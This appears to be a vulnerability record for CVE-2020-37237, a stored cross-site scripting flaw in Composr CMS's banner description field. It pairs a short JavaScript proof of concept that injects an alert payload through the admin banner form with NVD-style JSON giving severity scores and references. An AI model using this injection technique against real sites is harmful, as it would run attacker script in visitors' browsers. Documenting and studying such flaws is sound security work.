CVE-2020-37237

// PoC for CVE-2020-37237: Stored XSS in Composr CMS Banner Description // Attacker needs valid admin session cookies var maliciousPayload = "<img src=x onerror=alert('CVE-2020-37237')>"; // Target URL for adding a banner (Admin access required) var targetUrl = "http://target-site.com/adminzone/index.php?page=admin_banners&type=add"; // Data to be sent in the POST request var params = "banner_name=TestBanner&description=" + encodeURIComponent(maliciousPayload) + "&submit=1"; // Send request using fetch API (requires valid cookies context) fetch(targetUrl, { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded", "Cookie": "admin_session_cookie_here" }, body: params }) .then(response => { if(response.ok) console.log("Payload injected successfully. Visit homepage to trigger."); });

{"cve": {"id": "CVE-2020-37237", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:19.827", "lastModified": "2026-05-18T17:26:40.167", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Composr CMS 10.0.34 contains a persistent cross-site scripting vulnerability that allows authenticated administrators to inject malicious scripts through the banner management interface. Attackers with admin credentials can inject XSS payloads in the Description field of the Add banner functionality, which execute for all website visitors when they access the home page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://compo.sr/", "source": "[email protected]"}, {"url": "https://compo.sr/download.htm", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49190", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/composr-cms-persistent-cross-site-scripting-via-banners", "source": "[email protected]"}]}}